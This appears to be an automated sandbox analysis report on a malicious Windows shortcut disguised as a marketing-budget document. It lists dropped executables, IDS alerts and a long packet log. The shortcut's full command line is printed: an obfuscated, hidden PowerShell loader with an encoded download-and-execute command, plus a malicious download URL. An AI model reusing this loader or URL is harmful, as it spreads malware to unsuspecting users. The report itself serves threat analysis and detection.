                                                                                                                          SHA-512:4BDA0642A063BFE3B86FF97C2F7500910BEA416507B9814C0DDAC0631B1B30ED47DCC6E22752B6566353B4F7386522A6E3C104B3EB055C5BA938522ED095B429
                                                                                                                          Malicious:true
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: aQuwmiym51.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: gW6FHWNFzR.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: U82W1yZAYQ.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: ZGMW2wgPzY.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: z0gG2GA9vG.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: About-Us.docx lnk.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: Job-Description pdf lnk.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: 6GMmnAcpMs.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: Meeting-Registration pdf lnk.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: Mediatool-media-planning-guide lnk.lnk, Detection: malicious, Browse
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6 ..Xs..Xs..Xs...s..Xs..Yr..Xs..Ys,.Xs..[r..Xs..\r..Xs..]r..Xs..\r..Xs..Xs..Xs..]r.Xs..Xr..Xs..Zr..XsRich..Xs................PE..d...UR+g.........."....).:P...A................@.............................@............`...................................................|........................... ..L...............................(...P...@.............l..............................text....G.......H.................. ..`.managed..C..`....C..L.............. ..`hydrated.....`P..........................rdata..pq9...l..r9..>P.............@..@.data....x..........................@....pdata..............6..............@..@.rsrc...............................@..@.reloc..L.... .....................@..B................................................................................................................................................................

                                                                                                                          C:\Windows\Temp\svczHost.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8351232
                                                                                                                          Entropy (8bit):6.8702135246323905
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:3qyaZJr8q0SLK/1JQv6udEr3onGwuNztOqZ+:6BgqrKNwvdK3iGwgOqZ
                                                                                                                          MD5:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                                                          SHA1:B53BD3683487B873D1D4D0077C432698702CC347
                                                                                                                          SHA-256:41310862773697FF00306B143FFDA60C87D2EA4E44774289F1F2ED0E74D2CF1B
                                                                                                                          SHA-512:E7FC0571CB0BA516794A52A3277D3CB15049FFB739EBC203D80E6F9FCD08F6B5848AF470BA0F082A3D039472A83ED87512C0E4750946406649097C097EECFF40
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: aQuwmiym51.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: gW6FHWNFzR.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: U82W1yZAYQ.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: ZGMW2wgPzY.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: z0gG2GA9vG.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: About-Us.docx lnk.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: Job-Description pdf lnk.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: K05MQ5BcC8.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: eQwUFcwrXk.lnk, Detection: malicious, Browse
                                                                                                                          • Filename: 4YgQ2xN41W.lnk, Detection: malicious, Browse
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................^...............[.......[...............[.......Z.......Z......Rich............PE..d......g.........."....)..G..F9...............@.............................p............`..........................................(..X...h(..T....@.......p..D............P......0...........................(.......@............._..............................text...x'.......(.................. ..`.managed..;..@....;..,.............. ..`hydrated......G..........................rdata..\?2..._..@2...G.............@..@.data........P...n....z.............@....pdata..D....p........z.............@..@.rsrc........@.......V..............@..@.reloc.......P.......\..............@..B........................................................................................................................................................................................

                                                                                                                          \Device\ConDrv

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Temp\svczHost.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69
                                                                                                                          Entropy (8bit):4.90992700164429
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:eDLpHWf0wUWdhtq1OKxxT4y:eDLp2f0cdht6dT4y
                                                                                                                          MD5:4DE24891A3B1336A6AFA11CFF240FFDB
                                                                                                                          SHA1:AC301CC877CA4E302A95FB43C9AFE5F8D5584114
                                                                                                                          SHA-256:B61AB50894F6ABAE910C4FF65F59E3C73C480A8363E5765BD3F475F5F6BFBF84
                                                                                                                          SHA-512:22CC7B7C35CF6DD47080BFD0F1C0DAE6C79F15047B27BE8EB55CC56E628C1DD78CA4F736CBBC320222840786D6D3933EE59E1A2B3822C1D81C8B40964F5DD683
                                                                                                                          Malicious:false
                                                                                                                          Preview:Begin download https://uyt1n8ded9fb380.com/StaticFile/RdpService/32..

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=347, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                          Entropy (8bit):0.0010096928799849792
                                                                                                                          TrID:
                                                                                                                          • Windows Shortcut (20020/1) 100.00%
                                                                                                                          File name:SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk
                                                                                                                          File size:14'680'064 bytes
                                                                                                                          MD5:fd9940203c5ab5408fbb9dd774eba20f
                                                                                                                          SHA1:422f2f293d4f23f090520816f158a64acae1d33b
                                                                                                                          SHA256:a0ba93db49885e9631ec4487b711cbf95b0852ef404ff33e468b9d330524b7a7
                                                                                                                          SHA512:51dad62fd8409addce9b4e1e6603722201419e9b84092c9684eed007ee463b69741aa36d95284f3f51ae7e03d43a5b20a82d9d7a674e91a67fefaa8b3e16c33c
                                                                                                                          SSDEEP:48:8icY8uGAg5K+5P34A+5MwJDrOcUVQ/CrkpkVWlInx4OqI:8icsg5TiOwJy2CwKVWlwOh
                                                                                                                          TLSH:53E606102DFA00C9F1236B755FE8F2B792B5F4A4292EA1F451418A594B75984C433B76
                                                                                                                          File Content Preview:L..................F.B..................................[.......................1./.v. ./.k. .".s.^.t.^.a.r.^.t. ./.M.I.n. .".". .P.O.w.E.^.R.^.s.h.E.L.L. .-.W. .h.^.I.^.D.^.D.^.E.^.n. .-.n.O.^.l.^.o.g.o. .-.n.O.^.p. .-.E.p. .B.^.y.p.^.a.^.s.^.S. .-.E.N.C

                                                                                                                          File Icon

                                                                                                                          Icon Hash:69e9a9a9a3a3a1a5

                                                                                                                          Static Windows Shortcut Info

                                                                                                                          General

                                                                                                                          Relative Path:
                                                                                                                          Command Line Argument:/v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit
                                                                                                                          Icon location:%SystemRoot%\System32\imageres.dll

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-11-08T10:58:11.877522+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049729172.67.137.62443TCP
                                                                                                                          2024-11-08T10:58:14.194032+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049731172.67.137.62443TCP
                                                                                                                          2024-11-08T10:58:16.449478+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049733172.67.137.62443TCP
                                                                                                                          2024-11-08T10:58:39.626652+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049747172.67.137.62443TCP
                                                                                                                          2024-11-08T10:58:58.312682+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304975323.44.201.30443TCP
                                                                                                                          2024-11-08T10:59:41.507178+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049754172.67.137.62443TCP
                                                                                                                          2024-11-08T11:00:01.763692+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304975623.209.72.25443TCP
                                                                                                                          2024-11-08T11:00:21.598227+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049760172.67.137.62443TCP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 8, 2024 10:58:08.379286051 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:08.379307032 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:08.379506111 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:08.387646914 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:08.387655020 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:08.604984045 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:08.605362892 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:08.608325958 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:08.608338118 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:08.608654022 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:08.615530014 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:08.655971050 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:09.434869051 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:09.434902906 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:09.434940100 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:09.435115099 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:09.435127020 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:09.435169935 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:09.485022068 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:09.678054094 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:09.678122997 CET44349728172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:09.678596020 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:09.689605951 CET49728443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:10.839349985 CET49729443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:10.839376926 CET44349729172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:10.839581966 CET49729443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:10.839935064 CET49729443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:10.839945078 CET44349729172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:11.049336910 CET44349729172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:11.050555944 CET49729443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:11.050565958 CET44349729172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:11.877522945 CET44349729172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:11.877547026 CET44349729172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:11.877588987 CET44349729172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:11.877597094 CET44349729172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:11.877834082 CET49729443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:11.909066916 CET49729443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:12.068120956 CET49730443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:12.068142891 CET44349730172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:12.068296909 CET49730443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:12.068494081 CET49730443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:12.068500996 CET44349730172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:12.277024984 CET44349730172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:12.278019905 CET49730443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:12.278031111 CET44349730172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:12.278147936 CET49730443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:12.278155088 CET44349730172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:13.130487919 CET44349730172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:13.130534887 CET44349730172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:13.130636930 CET49730443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:13.130990028 CET49730443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:13.174580097 CET49731443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:13.174612999 CET44349731172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:13.174798965 CET49731443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:13.175218105 CET49731443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:13.175229073 CET44349731172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:13.384670973 CET44349731172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:13.386074066 CET49731443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:13.386090040 CET44349731172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:14.193995953 CET44349731172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:14.194037914 CET44349731172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:14.194108963 CET44349731172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:14.194240093 CET49731443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:14.194317102 CET49731443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:14.210664034 CET49731443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:14.237080097 CET49732443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:14.237128973 CET44349732172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:14.237282038 CET49732443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:14.237531900 CET49732443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:14.237541914 CET44349732172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:14.490303040 CET44349732172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:14.491122007 CET49732443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:14.491163969 CET44349732172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:14.491360903 CET49732443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:14.491370916 CET44349732172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:15.407284021 CET44349732172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:15.407363892 CET44349732172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:15.407684088 CET49732443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:15.407915115 CET49732443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:15.432358027 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:15.432387114 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:15.432549953 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:15.432863951 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:15.432869911 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:15.642940998 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:15.644273043 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:15.644288063 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.449502945 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.449533939 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.449578047 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.449604988 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.449728966 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:16.449738979 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.449857950 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:16.499121904 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:16.689539909 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.690115929 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.690116882 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.690702915 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.690973997 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:16.690984964 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.733508110 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:16.930427074 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.930473089 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.930546045 CET44349733172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:16.930634022 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:16.930825949 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:16.951447010 CET49733443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:17.535171032 CET49734443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:17.535197973 CET44349734172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:17.535378933 CET49734443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:17.535546064 CET49734443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:17.535561085 CET44349734172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:17.746469021 CET44349734172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:17.747312069 CET49734443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:17.747327089 CET44349734172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:17.747517109 CET49734443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:17.747525930 CET44349734172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:18.563975096 CET44349734172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:18.564032078 CET44349734172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:18.564199924 CET49734443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:18.564524889 CET49734443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:18.647587061 CET49735443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:18.647617102 CET44349735172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:18.647768974 CET49735443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:18.647927046 CET49735443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:18.647937059 CET44349735172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:18.857089996 CET44349735172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:18.858000040 CET49735443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:18.858010054 CET44349735172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:18.858153105 CET49735443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:18.858160019 CET44349735172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.236121893 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.236149073 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.236288071 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.239487886 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.239499092 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.464081049 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.464291096 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.465732098 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.465740919 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.465931892 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.468506098 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.512059927 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.667639017 CET44349735172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.667701960 CET44349735172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.667808056 CET49735443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.668104887 CET49735443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.712362051 CET49737443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.712383986 CET44349737172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.712658882 CET49737443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.712829113 CET49737443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.712837934 CET44349737172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.923084974 CET44349737172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.924097061 CET49737443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.924108028 CET44349737172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:19.924293995 CET49737443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:19.924302101 CET44349737172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.358031988 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.358081102 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.358105898 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.358128071 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.358266115 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.358273983 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.358457088 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.404555082 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.593972921 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.594090939 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.594111919 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.594358921 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.594368935 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.594559908 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.594598055 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.594652891 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.594932079 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.594939947 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.595349073 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.595355988 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.638820887 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.731873989 CET44349737172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.731936932 CET44349737172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.732177019 CET49737443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.732419014 CET49737443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.830677032 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.831027031 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.831046104 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.831510067 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.831521988 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.831551075 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.831585884 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.831890106 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.831891060 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.831902027 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.832119942 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.832312107 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:20.832321882 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:20.832695961 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.068304062 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.068406105 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.068423986 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.068572998 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.068598032 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.068779945 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.068840981 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.068914890 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.068923950 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.069153070 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.069263935 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.069318056 CET44349736172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:21.069322109 CET49736443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:21.069333076 CET44349736172.67.137.62192.168.11.30
